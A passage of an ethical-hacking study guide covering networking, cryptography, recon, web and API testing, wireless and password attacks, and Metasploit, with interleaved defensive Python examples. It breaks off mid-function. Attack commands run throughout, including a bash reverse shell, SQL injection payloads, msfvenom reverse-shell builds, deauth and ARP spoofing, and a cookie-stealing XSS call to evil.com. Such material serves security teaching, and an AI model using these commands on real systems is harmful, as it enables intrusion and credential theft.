// kirankumark-sec / Ethical-Hacking-MasterGuide v2.0

ETHICAL HACKING

MASTERGUIDE

Beginner → Expert · 23 Chapters · Cryptography · AD Attacks · Cloud Security · Forensics

github.com/kirankumark-sec | KIRAN KUMAR K
kali@kiran ~ zsh
┌──(kiran㉿kali)-[~]
└─$ nmap -sV -O --script=vuln 192.168.1.0/24
445/tcp open microsoft-ds → VULNERABLE: ms17-010
└─$ hashcat -m 1000 ntlm.txt rockyou.txt
[+] cracked: administrator:Password123!
└─$ python3 -c 'import hashlib; print(hashlib.sha256(b"data").hexdigest())'
3a6eb0790f39ac87c94f3856b2dd2c5d110e6811602261a9a923d3bb23adc8b7
└─$ msfconsole -q -x "use exploit/ms17_010_eternalblue; run"
23 Chapters · 80+ Tools · 200+ Commands · 12 Crypto Algos · Labs
// LOCKHEED MARTIN — CYBER KILL CHAIN (ATTACKER'S 7-STEP PLAYBOOK)
1 · Recon: OSINT, scanning, social media mining
2 · Weaponise: Exploit + payload creation
3 · Delivery: Email, USB, watering hole
4 · Exploit: Trigger vulnerability, code exec
5 · Install: RAT, rootkit, web shell
6 · C2: Command & Control channel
7 · Actions: Data theft, ransomware, pivot
01
// FOUNDATION LAYER
Introduction to Networking in Cyber Security
Every attack travels through a network. Understanding its architecture is the first step.
// NETWORK TYPES — SCALE & SCOPE
Type | Name | Scale | Example
LAN | Local Area | ≤ 1 km | Office/Home
MAN | Metropolitan | ≤ 100 km | City/Campus
WAN | Wide Area | Global | Internet/MPLS
🌐 IP Addressing

IPv4 — 32-bit · 4 octets · ~4.3 billion addresses

Class | Range | Use | Mask
A | 1–126.x.x.x | Large orgs | /8
B | 128–191.x.x.x | Medium | /16
C | 192–223.x.x.x | Small | /24
D | 224–239.x.x.x | Multicast | n/a
Private Ranges (RFC 1918):
10.0.0.0/8 · 172.16-31.x.x/12 · 192.168.0.0/16
🔌 Critical Ports
Port | Service | Risk
21 | FTP | High – plaintext
22 | SSH | Brute force
23 | Telnet | Critical – no encryption
53 | DNS | Zone transfer
80/443 | HTTP/S | Web attacks
445 | SMB | EternalBlue
3389 | RDP | BlueKeep
1433 | MSSQL | SQLi exposure
02
// PROTOCOLS & MODELS
Basics of Networking
OSI model, TCP/IP, subnetting — the skeleton every packet travels through.
// OSI 7-LAYER MODEL — WITH ATTACK VECTORS
Layer | Name | Function | Protocols | Attack vectors
7 | Application | User interfaces, APIs, web browsers | HTTP · DNS · FTP | XSS · SQLi · RCE
6 | Presentation | Encoding, encryption, compression | TLS/SSL | SSL Strip · Downgrade
5 | Session | Establish, manage sessions | NetBIOS | Session Hijack
4 | Transport | End-to-end delivery, ports | TCP · UDP | SYN Flood · Port Scan
3 | Network | IP addressing, routing | IP · ICMP | IP Spoof · MITM
2 | Data Link | MAC addresses, frames, switches | Ethernet · ARP | ARP Spoof · MAC Flood
1 | Physical | Bits, cables, radio signals | Cables | Wiretap · Jamming

Mnemonic (7→1): "All People Seem To Need Data Processing"

🔄 TCP 3-Way Handshake
CLIENT → SERVER: SYN
SERVER → CLIENT: SYN-ACK
CLIENT → SERVER: ACK → Connected!
SYN Flood: send thousands of SYNs and never send the final ACK → the server exhausts its half-open connection queue → DoS.
📐 Subnetting (CIDR)
Example 192.168.1.0/24: 192 (NET) . 168 (NET) . 1 (NET) . 0 (HOST)
CIDR | Mask | Hosts
/8 | 255.0.0.0 | 16.7M
/16 | 255.255.0.0 | 65,534
/24 | 255.255.255.0 | 254
/30 | 255.255.255.252 | 2
Formula: Hosts = 2^n − 2 (n = host bits)
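The CIDR arithmetic above, worked in Python's standard ipaddress module. This is an added example and not code from the MasterGuide: it applies Hosts = 2^n − 2 to any prefix length, prints mask and broadcast, checks membership in the RFC 1918 ranges listed on the page, and carves a network into smaller subnets. The sample CIDRs are constructed.

```python
import ipaddress

# RFC 1918 private ranges, as listed on the page
PRIVATE_RANGES = [
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("172.16.0.0/12"),
    ipaddress.ip_network("192.168.0.0/16"),
]


def usable_hosts(prefix_len):
    """Hosts = 2^n - 2 with n = host bits (32 - prefix). /31 and /32 yield 0."""
    host_bits = 32 - prefix_len
    return max(2 ** host_bits - 2, 0)


def ip_class(address):
    """Classful range of an IPv4 address by first octet (A-D as in the page's table)."""
    first = int(ipaddress.ip_address(str(address))) >> 24
    if 1 <= first <= 126:
        return "A"
    if first == 127:
        return "loopback"
    if 128 <= first <= 191:
        return "B"
    if 192 <= first <= 223:
        return "C"
    if 224 <= first <= 239:
        return "D"
    return "E/reserved"


def describe_subnet(cidr):
    """Network, mask, broadcast, usable hosts and RFC 1918 status for a CIDR.
    strict=False maps a host address such as 192.168.1.77/24 to its network."""
    net = ipaddress.ip_network(cidr, strict=False)
    # only enumerate hosts for small networks; a /8 would be 16.7M entries
    hosts = list(net.hosts()) if net.prefixlen >= 24 else None
    return {
        "network": str(net.network_address),
        "mask": str(net.netmask),
        "prefix": net.prefixlen,
        "broadcast": str(net.broadcast_address),
        "usable_hosts": usable_hosts(net.prefixlen),
        "first_host": str(hosts[0]) if hosts else None,
        "last_host": str(hosts[-1]) if hosts else None,
        "private": any(net.subnet_of(r) for r in PRIVATE_RANGES),
        "class": ip_class(net.network_address),
    }


def split_subnet(cidr, new_prefix):
    """Carve a network into equal subnets, e.g. a /24 into four /26s."""
    net = ipaddress.ip_network(cidr, strict=False)
    return [str(s) for s in net.subnets(new_prefix=new_prefix)]


if __name__ == "__main__":
    for cidr in ("192.168.1.77/24", "10.0.0.0/8", "172.20.5.0/30", "8.8.8.0/24"):
        print(cidr, describe_subnet(cidr))
    print(split_subnet("192.168.1.0/24", 26))
```

When reviewing a scope or a firewall rule, describe_subnet tells you immediately whether an address range is internal (RFC 1918) and how many hosts it actually covers, which is the usual source of over-broad allow rules.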
03
// HACKER'S OS
Linux Command Line Interface
Kali Linux — master the terminal and you master the field.
# Navigation
pwd / ls -la / cd /etc
find / -name "*.conf" 2>/dev/null
locate passwd
# File Ops
cat /etc/passwd
grep -i "root" file.txt
awk '{print $1}' log.txt
sed -i 's/old/new/g' file
cut -d: -f1 /etc/passwd
# Network
ip a / ip route
ss -tulnp
netstat -an
tcpdump -i eth0 -w cap.pcap
curl -v http://target/
wget -q http://evil.com/shell.sh
# Permission format: Type|User|Group|Other
-rwxr-xr-- (r=4 w=2 x=1)
chmod 755 script.sh
chown root:root file
# SUID binaries — PRIVESC GOLD
find / -perm -4000 -type f 2>/dev/null
# Process & Users
ps aux
sudo -l  # what can I sudo?
cat /etc/shadow
id / whoami / groups
history
env
crontab -l
cat /etc/crontab
# Bash reverse shell (one-liner)
bash -i >& /dev/tcp/10.10.10.1/4444 0>&1
04
// CORE PHILOSOPHY
Introduction to Cyber Security
CIA Triad, hacker types, and the attacker mindset.
// CIA TRIAD
🔐 CONFIDENTIALITY
Only authorised users can view sensitive data. Protected from eavesdroppers.
Controls: Encryption · ACL · MFA · Classification
⚠ Data theft · Eavesdropping
INTEGRITY
Data must remain accurate and unaltered during storage and transmission.
Controls: Hashing · Digital Signatures · Checksums
⚠ MITM tampering · Rootkits
AVAILABILITY
Systems must be accessible for authorised users when required.
Controls: Redundancy · Backups · DDoS mitigation
⚠ DoS · DDoS · Ransomware
🤍 White Hat

Ethical hacker with written permission. Responsible disclosure. CEH / OSCP certified.

Legal · Certified
🖤 Black Hat

Malicious attacker. No permission. Financial gain, revenge, espionage, or ideology.

Criminal · Prosecuted
🩶 Grey Hat

Hacks without permission but may disclose findings. Legally risky — still unauthorised.

Risky · Bug Bounty
05
// CORE SCIENCE
Cryptography — Hashing, Encryption & PKI
The mathematical backbone of security. Understand SHA-256, AES, RSA, and when to use each.
// HASHING vs ENCRYPTION vs ENCODING — THE CRITICAL DIFFERENCE
🔁 HASHING
Direction: ONE-WAY (irreversible)
Output: Fixed-length digest
Key? No key needed
Purpose: Integrity verification, passwords
Algorithms: MD5, SHA-1, SHA-256, SHA-3, bcrypt
Example: "hello" → 2cf24dba5...
🔐 ENCRYPTION
Direction: TWO-WAY (reversible)
Output: Variable ciphertext
Key? Key required
Purpose: Confidentiality of data
Algorithms: AES, RSA, DES, 3DES, ChaCha20
Example: "hello" + key → QmFzZTY0...
Encoding ≠ Encryption: Base64/URL encoding is NOT security — it's just a format change. Anyone can decode it. Never use encoding to protect sensitive data.
🔑 HASHING ALGORITHMS — DEEP DIVE
MD5
BROKEN ✗
128-bit output. Designed 1992. Collision attacks demonstrated in minutes. Never use for security. Still used for checksums/non-security integrity.
5d41402abc4b2a76b9719d911017c592
SHA-1
DEPRECATED ✗
160-bit output. Designed 1995. SHA-1 collision found 2017 (SHAttered). Deprecated for TLS/code signing. Avoid in new systems.
aaf4c61ddcc5e8a2dabede0f3b482cd9aea9434d
SHA-256
SECURE ✓
256-bit output. Part of SHA-2 family. Used in Bitcoin, TLS 1.3, SSL certs, JWT signatures, Git commits. Gold standard for integrity checks.
2cf24dba5fb0a30e26e83b2ac5b9e29e1b161e5c...
SHA-512
SECURE ✓
512-bit output. SHA-2 family. Stronger than SHA-256. Ideal for high-security password hashing combined with salt. Slower = better for passwords. Caveat: a single salted SHA-512 still runs at GPU speed, so for stored passwords wrap it in a slow KDF or use bcrypt/Argon2 below.
SHA-3 / Keccak
MODERN ✓
NIST standard 2015. Different design than SHA-2 (sponge construction). Not a replacement for SHA-2 but an alternative. Used in the Ethereum blockchain.
bcrypt
PASSWORDS ✓
Adaptive cost factor. Built-in salting prevents rainbow tables. Intentionally slow. Best for password storage alongside Argon2 and scrypt.
Argon2
BEST PRACTICE ✓
Winner of Password Hashing Competition 2015. Memory-hard — resists GPU/ASIC attacks. Three variants: Argon2i, Argon2d, Argon2id (recommended).
NTLM Hash
WINDOWS ⚠
MD4-based Windows password hash. No salt. Vulnerable to pass-the-hash attacks. Stored in SAM database. Crackable with hashcat in seconds with GPU.
🔒 ENCRYPTION ALGORITHMS — SYMMETRIC vs ASYMMETRIC
// SYMMETRIC vs ASYMMETRIC ENCRYPTION
⚡ SYMMETRIC (Same Key)
  • Same key encrypts AND decrypts
  • Fast — ideal for bulk data encryption
  • Key distribution problem (must share securely)
  • Algorithms: AES, DES, 3DES, Blowfish, ChaCha20
  • Use cases: File encryption, disk encryption, VPN tunnels
AES-128 · AES-256 · ChaCha20
🔑 ASYMMETRIC (Key Pair)
  • Public key encrypts, Private key decrypts
  • Slow — used for key exchange, signatures
  • No key distribution problem
  • Algorithms: RSA, ECC, Diffie-Hellman, ElGamal
  • Use cases: TLS/HTTPS, SSH, PGP email, JWT
RSA-2048 · ECDSA · Ed25519
🛡 AES — Advanced Encryption Standard
AES is the gold standard — adopted by NIST 2001, used by NSA for TOP SECRET data (AES-256).
Variant | Key Size | Rounds | Security Level
AES-128 | 128 bits | 10 | Strong
AES-192 | 192 bits | 12 | Stronger
AES-256 | 256 bits | 14 | Military grade
AES MODES OF OPERATION
ECB Electronic Code Book. INSECURE — same plaintext → same ciphertext (patterns visible)
CBC Cipher Block Chaining. Each block XOR'd with previous. Needs IV. Common.
GCM Galois Counter Mode. Authenticated encryption. Recommended for modern apps.
CTR Counter Mode. Turns block cipher into stream cipher. Parallelizable.
🔏 RSA — Rivest–Shamir–Adleman
Based on: the difficulty of factoring the product of two large primes. A 2048-bit RSA key has ~617 decimal digits.
Key Size | Security | Use Today?
512-bit | Broken | Never
1024-bit | Weak | Avoid
2048-bit | Adequate | Minimum
4096-bit | Strong | Recommended

RSA is used for:
TLS handshake key exchange · SSH public key auth · Digital signatures · Code signing

Quantum Threat: Shor's algorithm on a quantum computer could break RSA. NIST is standardising post-quantum cryptography (CRYSTALS-Kyber, CRYSTALS-Dilithium).
# Python — Hash Examples
import hashlib
# SHA-256
h = hashlib.sha256(b"secret").hexdigest()
# → 2bb80d537b1da3e38bd30361aa855686bde0eacd7162fef6a25fe97bf527a25b
# MD5 (checksum only!)
hashlib.md5(b"data").hexdigest()
# bcrypt password hashing
import bcrypt
hashed = bcrypt.hashpw(b"password", bcrypt.gensalt(rounds=12))
bcrypt.checkpw(b"password", hashed)  # → True

# Python — AES Encryption (PyCryptodome)
from Crypto.Cipher import AES
from Crypto.Random import get_random_bytes
key = get_random_bytes(32)  # AES-256
cipher = AES.new(key, AES.MODE_GCM)
ciphertext, tag = cipher.encrypt_and_digest(b"plaintext")
# store cipher.nonce alongside ciphertext and tag: the receiver needs all three to decrypt and verify

# OpenSSL — Generate RSA key pair
openssl genrsa -out private.pem 4096
openssl rsa -in private.pem -pubout -out public.pem
# OpenSSL — Encrypt/Decrypt with AES-256-CBC
openssl enc -aes-256-cbc -pbkdf2 -in plain.txt -out enc.bin
openssl enc -aes-256-cbc -d -pbkdf2 -in enc.bin -out dec.txt
# Hash a file with SHA-256
sha256sum file.txt
openssl dgst -sha256 file.txt
# Identify unknown hash type
hashid '$2y$12$abc...'  # → bcrypt
hash-identifier  # interactive
# Crack hashes with hashcat
hashcat -m 0 hash.txt rockyou.txt  # MD5
hashcat -m 100 hash.txt rockyou.txt  # SHA-1
hashcat -m 1400 hash.txt rockyou.txt  # SHA-256
hashcat -m 3200 hash.txt rockyou.txt  # bcrypt (SLOW)
hashcat -m 1000 hash.txt rockyou.txt  # NTLM (Windows)
// PKI & TLS HANDSHAKE — HOW HTTPS ACTUALLY WORKS
1 · Client Hello: Cipher suites, TLS version
2 · Server Hello: Chosen cipher + Certificate
3 · Cert Verify: Check CA signature chain
4 · Key Exchange: ECDHE / DH shared secret
5 · Session Keys: Derive AES symmetric key
6 · Encrypted Data: AES-GCM bulk transfer
Key insight: RSA/ECDH is only used for key exchange (slow). Bulk data uses AES (fast). This hybrid approach gives the best of both worlds.
🔑 Digital Signatures
  • Sign with private key → verify with public key
  • Provides: authentication + non-repudiation + integrity
  • Used in: code signing, email (S/MIME), JWT tokens
  • Algorithms: RSA-PSS, ECDSA, Ed25519
Flow: hash(message) → sign hash with private key → receiver verifies with public key
🌐 Common Crypto Attacks
  • Rainbow Table — precomputed hash lookup. Defeated by salting.
  • Padding Oracle — CBC mode timing leak reveals plaintext
  • BEAST/POODLE — SSL/TLS downgrade attacks
  • Bit-flipping — Modify CBC ciphertext to change plaintext
  • Length Extension — MD5/SHA-1/SHA-256 hash extension
📋 Crypto Quick Reference
Use Case | Recommendation
Password storage | Argon2id / bcrypt
File integrity | SHA-256
Symmetric encrypt | AES-256-GCM
Asymmetric | RSA-4096 / ECC P-384
Key exchange | ECDHE
TLS minimum | TLS 1.2 / TLS 1.3
AVOID | MD5, SHA-1, DES, RC4
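The hashing-vs-encoding distinction, the salted password storage that defeats rainbow tables, and the hash-then-authenticate flow from the signatures section, worked with only the Python standard library. This is an added example, not the MasterGuide's code: PBKDF2-HMAC-SHA256 stands in for Argon2id/bcrypt (which need third-party packages) and HMAC stands in as the shared-key counterpart of sign-then-verify; the iteration count, the record format and the sample inputs are my own choices.

```python
import base64
import hashlib
import hmac
import secrets

# Iteration count for the password KDF; chosen to be slow for an attacker, tunable per deployment
PBKDF2_ITERATIONS = 600_000


def sha256_hex(data):
    """Fixed-length, one-way digest: the integrity tool from the table above."""
    return hashlib.sha256(data).hexdigest()


def verify_integrity(data, expected_hex):
    """File-integrity check: recompute the digest and compare in constant time."""
    return hmac.compare_digest(sha256_hex(data), expected_hex.lower())


def base64_roundtrip(secret):
    """Encoding is reversible without any key, which is why it is not protection."""
    encoded = base64.b64encode(secret)
    return encoded, base64.b64decode(encoded)


def hash_password(password, iterations=PBKDF2_ITERATIONS):
    """Salted, slow password hash. A fresh random salt means two users with the
    same password get different records, so a precomputed table is useless."""
    salt = secrets.token_bytes(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return "pbkdf2_sha256${}${}${}".format(iterations, salt.hex(), dk.hex())


def verify_password(password, stored):
    """Recompute with the stored salt and iteration count; constant-time compare."""
    try:
        algo, iterations, salt_hex, dk_hex = stored.split("$")
    except ValueError:
        return False
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


def mac_message(key, message):
    """hash(message) under a shared key: HMAC is the symmetric counterpart of the
    sign-then-verify flow; any modified byte changes the tag."""
    return hmac.new(key, message, hashlib.sha256).hexdigest()


def verify_mac(key, message, tag):
    return hmac.compare_digest(mac_message(key, message), tag)


if __name__ == "__main__":
    print(sha256_hex(b"hello"))
    print(base64_roundtrip(b"not a secret anymore"))
    record = hash_password("Password123!")
    print(record, verify_password("Password123!", record))
```

Note that verify_password reads the iteration count back from the record, so a deployment can raise the cost for new records without breaking old ones, and both comparisons use hmac.compare_digest so a string compare cannot leak how many leading bytes matched.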
06
// PHASE 1 — INTELLIGENCE
Information Gathering & Reconnaissance
"Know your enemy and know yourself..." — Sun Tzu
// PASSIVE vs ACTIVE RECON
🕵️ PASSIVE — No Direct Contact
  • WHOIS — Domain owner, registrar
  • Google Dorking — site: filetype: inurl:
  • Shodan — Find exposed internet devices
  • theHarvester — Emails, subdomains
  • Maltego — Visual link-analysis
  • Wayback Machine — Historic snapshots
Zero detection risk · Legal
⚡ ACTIVE — Direct Interaction
  • Nmap / Masscan — Port scanning
  • Nikto — Web server scanning
  • Gobuster / Dirb / ffuf — Dir brute-force
  • DNS Enumeration — Zone transfer
  • Banner Grabbing — netcat, curl -I
  • WhatWeb — Web tech fingerprint
Detectable in logs
whois target.com
dig target.com ANY +noall +answer
dig axfr @ns1.target.com target.com  # zone transfer!
sublist3r -d target.com
amass enum -d target.com -passive
theharvester -d target.com -b all
# Google Dorks
site:target.com filetype:pdf
site:target.com inurl:admin
site:target.com ext:sql OR ext:bak
intitle:"index of" site:target.com
"@target.com" filetype:xls
# Shodan dorks
org:"Target Corp" port:22
hostname:target.com
vuln:CVE-2021-44228
07
// PHASE 2 — MAPPING
Scanning & Enumeration
Map every open door. Nmap is the master key.
nmap 192.168.1.0/24  # subnet scan
nmap -sS target  # SYN stealth
nmap -sU target  # UDP scan
nmap -p- target  # all 65535 ports
nmap -sV -O -A target  # aggressive (ver+OS+scripts)
nmap --script=vuln target  # vulnerability scripts
nmap --script=smb-vuln-ms17-010 target
nmap -D RND:10 target  # decoy IPs (evasion)
nmap -T0 target  # paranoid timing (stealthiest)
# SMB Enumeration
enum4linux -a 192.168.1.1
smbmap -H 192.168.1.1
# Web Enumeration
gobuster dir -u http://target -w /usr/share/wordlists/dirb/common.txt
ffuf -u http://target/FUZZ -w common.txt -mc 200,301,302
nikto -h http://target
08
// WEB SECURITY STANDARD
VAPT — Vulnerability Assessment & Penetration Testing
OWASP Top 10 is the bible. Burp Suite is your weapon.
// OWASP TOP 10 — 2021
A01:2021 ⬆️
Broken Access Control
IDORs, missing auth checks on API endpoints
A02:2021 ⬆️
Cryptographic Failures
MD5/SHA-1 passwords, plain HTTP, weak TLS
A03:2021
Injection
SQLi, NoSQLi, OS command injection
A04:2021 🆕
Insecure Design
No threat modelling, missing security reqs
A05:2021 ⬆️
Security Misconfiguration
Default creds, open buckets, verbose errors
A06:2021 ⬆️
Vulnerable Components
Libraries with known CVEs — Log4Shell
A07:2021 ⬇️
Auth Failures
Credential stuffing, no MFA, weak session
A08:2021 🆕
Software Integrity
Insecure CI/CD, supply chain attacks
A09:2021 ⬆️
Logging Failures
No alerting on breaches, missing audit logs
A10:2021 🆕
SSRF
Server fetches internal resources for attacker
💉 SQL Injection Playbook
# Auth Bypass
admin'--
' OR '1'='1'--
# UNION-Based
' ORDER BY 3--  # find column count
' UNION SELECT 1,user(),3--
' UNION SELECT 1,table_name,3 FROM information_schema.tables--
# Blind Boolean
' AND 1=1--  # True
' AND 1=2--  # False (different response)
# Time-Based Blind
' AND SLEEP(5)--  # 5s delay = SQLi!
# SQLMap automation
sqlmap -u "http://t/?id=1" --dbs --batch
sqlmap -u "http://t/?id=1" -D db --tables
sqlmap -u "http://t/?id=1" -D db -T users --dump
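Why the auth-bypass payloads above work, and the one change that stops them, shown side by side. This is an added example rather than code from the MasterGuide: a constructed in-memory SQLite table, a login written with string concatenation, and the same login written with a parameterised query. The table stores plaintext passwords only to keep the injection mechanics visible; a real system stores hashes (chapter 05).

```python
import sqlite3


def make_demo_db():
    """Constructed two-user table held in memory."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "S3cret!"), ("alice", "wonderland")])
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """String concatenation: the user's input becomes SQL syntax.
    admin'-- closes the string and comments out the password check."""
    sql = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Parameterised query: the driver sends values separately from the statement,
    so a quote or a comment marker in the input is only ever data."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


def try_both(username, password):
    """Run the same credentials through both implementations on a fresh database."""
    conn = make_demo_db()
    return {"vulnerable": login_vulnerable(conn, username, password),
            "safe": login_safe(conn, username, password)}


if __name__ == "__main__":
    for payload in ("admin'--", "' OR '1'='1'--"):
        print(repr(payload), try_both(payload, "wrong"))
    print("legitimate", try_both("alice", "wonderland"))
```

The second payload returns the first row of the table (here admin) because the WHERE clause collapses to a tautology; in the parameterised version the whole string is compared against the username column and matches nothing.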
📊 CVSS Severity Scale
🔴 CRITICAL | 9.0 – 10.0
🟠 HIGH | 7.0 – 8.9
🟡 MEDIUM | 4.0 – 6.9
🟢 LOW | 0.1 – 3.9
🔵 INFO | 0.0
Nessus · OpenVAS · Nikto · Burp Suite
09
// API SECURITY
API Penetration Testing
APIs power every modern app and are riddled with auth bypasses and logic flaws.
🔌 API Attack Surface
Type | Format | Common Vuln
REST | JSON/HTTP | BOLA, Mass Assignment
GraphQL | JSON | Introspection, DoS deep query
SOAP | XML | XXE injection
BOLA: /users/123 → /users/124. Most common API vuln. Always test in real apps.
ffuf -w api-endpoints.txt -u https://api.t/FUZZ
# GraphQL introspection
{"query":"{__schema{types{name fields{name}}}}"}
# JWT attacks
jwt_tool token.jwt -X a  # alg:none attack
jwt_tool token.jwt -C -d rockyou.txt  # crack
# Mass Assignment
POST /api/register {"username":"hacker","role":"admin"}
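The three API weaknesses in the table (BOLA on /users/123 → /users/124, mass assignment on /api/register, deep GraphQL queries) with the vulnerable handler beside its hardened form. This is an added example and not the MasterGuide's code; the user records, the field allowlist and the depth limit are constructed for illustration.

```python
# Constructed user records keyed by id; each record is owned by that user
USERS = {
    123: {"id": 123, "username": "alice", "email": "alice@example.com", "role": "user"},
    124: {"id": 124, "username": "bob", "email": "bob@example.com", "role": "user"},
}
REGISTER_ALLOWLIST = {"username", "email", "password"}
MAX_GRAPHQL_DEPTH = 5


class Forbidden(Exception):
    pass


def get_user_vulnerable(requested_id, caller_id):
    """Authenticated but not authorised: any logged-in caller reads any id (BOLA)."""
    return USERS[requested_id]


def get_user_safe(requested_id, caller_id, caller_role="user"):
    """Object-level check: the record must belong to the caller (or caller is admin).
    Missing and foreign ids raise the same error so ids cannot be enumerated."""
    record = USERS.get(requested_id)
    if record is None or (record["id"] != caller_id and caller_role != "admin"):
        raise Forbidden("not found")
    return record


def register_vulnerable(payload):
    """Mass assignment: every client-supplied field lands on the new account."""
    account = {"role": "user"}
    account.update(payload)
    return account


def register_safe(payload):
    """Allowlist of writable fields; privileged attributes are set server-side only."""
    unexpected = set(payload) - REGISTER_ALLOWLIST
    if unexpected:
        raise ValueError("unexpected fields: %s" % sorted(unexpected))
    account = {k: payload[k] for k in REGISTER_ALLOWLIST if k in payload}
    account["role"] = "user"
    return account


def graphql_depth(query):
    """Maximum selection-set nesting of a query; unbounded depth is a DoS vector."""
    depth = deepest = 0
    for ch in query:
        if ch == "{":
            depth += 1
            deepest = max(deepest, depth)
        elif ch == "}":
            depth -= 1
    return deepest


def accept_graphql(query, limit=MAX_GRAPHQL_DEPTH):
    """Reject before execution rather than after the resolver has done the work."""
    return graphql_depth(query) <= limit


if __name__ == "__main__":
    print(get_user_vulnerable(124, 123))
    print(register_vulnerable({"username": "hacker", "role": "admin"}))
    print(graphql_depth("{__schema{types{name fields{name}}}}"))
```

The safe handlers fail closed: an unknown field is an error rather than silently dropped, which also surfaces client bugs early, and the depth check runs on the raw query text before any resolver is invoked.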
10
// NETWORK ATTACKS
Network Penetration Testing — Part I
EternalBlue to pivoting through internal networks.
💣 Famous CVEs
CVE | Name | Service | CVSS
CVE-2017-0144 | EternalBlue | SMBv1/445 | 10.0
CVE-2019-0708 | BlueKeep | RDP/3389 | 9.8
CVE-2014-0160 | Heartbleed | OpenSSL | 7.5
CVE-2014-6271 | Shellshock | Bash/CGI | 10.0
CVE-2021-44228 | Log4Shell | Log4j | 10.0
CVE-2021-34527 | PrintNightmare | Print Spooler | 8.8
# SSH SOCKS5 proxy
ssh -D 9050 user@pivot
proxychains nmap 192.168.2.0/24
# SSH port forward
ssh -L 8080:internal:80 user@pivot
# Meterpreter pivot
run autoroute -s 192.168.2.0/24
use auxiliary/server/socks_proxy
# Chisel tunneling
./chisel server -p 8080 --reverse
./chisel client attacker:8080 R:1080:socks
11
// WIRELESS
Network PT — Part II (Wireless)
WPA2 cracking, rogue APs, deauth attacks, MITM over the air.
📡 WPA2 Attack Flow
1 · Monitor Mode
airmon-ng start wlan0
2 · Scan Networks
airodump-ng wlan0mon
3 · Capture Handshake
airodump-ng -c 6 --bssid BSSID -w cap wlan0mon
4 · Deauth Attack
aireplay-ng --deauth 100 -a BSSID wlan0mon
5 · Crack Handshake
aircrack-ng cap.cap -w rockyou.txt
arpspoof -i eth0 -t 192.168.1.5 192.168.1.1
arpspoof -i eth0 -t 192.168.1.1 192.168.1.5
echo 1 > /proc/sys/net/ipv4/ip_forward
# Modern: bettercap
bettercap -iface eth0
net.probe on; arp.spoof on; net.sniff on
# SSL stripping
hsts.bypass.domains target.com
https.proxy.sslstrip true
12
// CREDENTIAL ATTACKS
Password Attacks & Hash Cracking
GPU-accelerated cracking breaks hashes in seconds.
# Key hash modes
# 0=MD5 100=SHA1 1400=SHA256
# 1000=NTLM 3200=bcrypt 13100=Kerberoast
hashcat -m 0 hashes.txt rockyou.txt  # MD5
hashcat -m 1000 ntlm.txt rockyou.txt  # NTLM
hashcat -m 3200 bcrypt.txt words.txt  # bcrypt
hashcat -m 0 -a 3 hash.txt ?a?a?a?a?a?a  # brute
hashcat -m 0 -r best64.rule hash.txt words.txt  # rules
# Identify hash type
hashid '$2y$10$abc...'
name-that-hash -t '$1$xyz...'
hydra -l admin -P rockyou.txt ssh://192.168.1.1
hydra -l admin -P pass.txt ftp://192.168.1.1
hydra -l admin -P rockyou.txt 192.168.1.1 \
  http-post-form "/login:u=^USER^&p=^PASS^:Invalid"
hydra -l administrator -P rockyou.txt rdp://target
# John the Ripper
john --wordlist=rockyou.txt /etc/shadow
john --rules --wordlist=rockyou.txt hash.txt
13
// EXPLOIT FRAMEWORK
Metasploit Framework
2000+ exploits. Meterpreter post-exploitation. The most powerful open-source pentest platform.
msfconsole
msf6> search ms17-010
msf6> use exploit/windows/smb/ms17_010_eternalblue
msf6> set RHOSTS 192.168.1.10
msf6> set LHOST 192.168.1.99
msf6> set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6> run
# Meterpreter post-exploitation
meterpreter> sysinfo  # OS info
meterpreter> getuid  # current user
meterpreter> getsystem  # → SYSTEM!
meterpreter> hashdump  # dump NTLM hashes
meterpreter> screenshot
meterpreter> keyscan_start
meterpreter> run post/multi/recon/local_exploit_suggester
meterpreter> run post/windows/gather/credentials/credential_collector
# Generate payloads with msfvenom
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x LPORT=4444 -f exe -o shell.exe
msfvenom -p linux/x64/shell_reverse_tcp LHOST=x LPORT=4444 -f elf -o shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=x LPORT=4444 -f raw -o shell.php
14
// ADVANCED WEB
Advanced Web Application Testing
IDOR, SSTI, XXE, SSRF — the acronyms that lead to full server compromise.
🔥 Advanced Vulns Cheat Sheet
Vuln | Payload | Impact
IDOR | /invoice?id=1337 → 1338 | Data exposure
SSTI | {{ 7*7 }} → 49 | RCE
XXE | <!ENTITY x SYSTEM "file:///etc/passwd"> | File read
SSRF | url=http://169.254.169.254/ | Internal access
Path Traversal | ../../etc/passwd | File read
CSRF | Auto-submit form from evil.com | Action on behalf
Clickjacking | Transparent iframe over page | UI redress
DOM XSS | <img src=x onerror=alert(1)> | Session steal
🛠 Burp Suite Workflow
  • Proxy — Intercept every HTTP/S request, modify params live
  • Repeater — Replay & tweak individual requests manually
  • Intruder — Fuzzing, brute force, payload positions
  • Scanner — Active scan for XSS, SQLi, SSRF (Pro)
  • Collaborator — OOB testing for blind SSRF, XXE, Log4Shell
  • Decoder — Base64, URL, HTML, Hex encode/decode
# Reflected XSS
<script>alert(document.cookie)</script>
# Steal cookies (attacker's server)
<img src=x onerror="fetch('http://evil.com/?c='+document.cookie)">
# Bypass WAF
<svg onload=alert(1)>
jaVasCrIpT:alert(1)
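The server-side fixes for three rows of the cheat sheet (XSS, Path Traversal, CSRF), run against the page's own payloads. This is an added example and not code from the MasterGuide: output encoding for an HTML body context, a path-normalisation guard that keeps file reads inside a document root, and a synchroniser CSRF token bound to the session with HMAC. The document root, session ids and server key are hypothetical values.

```python
import hashlib
import hmac
from pathlib import Path

FILES_ROOT = "/srv/app/files"  # hypothetical document root for downloads


def render_comment(user_text):
    """Output encoding for an HTML body context: <, >, &, " and ' become entities,
    so the XSS payloads above render as text instead of executing."""
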